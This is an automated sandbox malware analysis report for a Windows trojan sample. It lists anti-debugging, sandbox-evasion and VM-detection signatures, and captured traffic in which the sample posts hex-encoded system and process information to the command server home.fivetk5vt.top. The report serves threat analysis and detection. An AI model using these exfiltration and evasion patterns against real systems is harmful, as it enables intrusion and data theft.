Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
28PCC9oa8s.exe

Overview

General Information

Sample name:28PCC9oa8s.exe
renamed because original name is a hash value
Original sample name:8a549f15d1418fb4207aadb4ba813a36.exe
Analysis ID:1578970
MD5:8a549f15d1418fb4207aadb4ba813a36
SHA1:9019f532acc00096055788d1212842e8bec35627
SHA256:7dc314359cdb76163923b61fc91175c7a09577e37443ca9711ba9c6b33863391
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • 28PCC9oa8s.exe (PID: 7672 cmdline: "C:\Users\user\Desktop\28PCC9oa8s.exe" MD5: 8A549F15D1418FB4207AADB4BA813A36)
    • WerFault.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 28PCC9oa8s.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 28PCC9oa8s.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 28PCC9oa8s.exeJoe Sandbox ML: detected
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d8a7d1ca-2
Source: 28PCC9oa8s.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5vt.top
Source: unknownHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzX
Source: 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXdA
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000002.1712666918.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1610565392.00000000014D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
Source: 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO
Source: 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1336590433.0000000001497000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

barindex
PE file contains section with special chars
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: .idata
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144
Source: 28PCC9oa8s.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 28PCC9oa8s.exeStatic PE information: Section: souunsyz ZLIB complexity 0.9948484726974622
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
Source: C:\Users\user\Desktop\28PCC9oa8s.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1721fbd3-0ead-4257-905f-01e1835e0f2eJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 28PCC9oa8s.exeReversingLabs: Detection: 65%
Source: 28PCC9oa8s.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\28PCC9oa8s.exe "C:\Users\user\Desktop\28PCC9oa8s.exe"
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dnsapi.dllJump to behavior
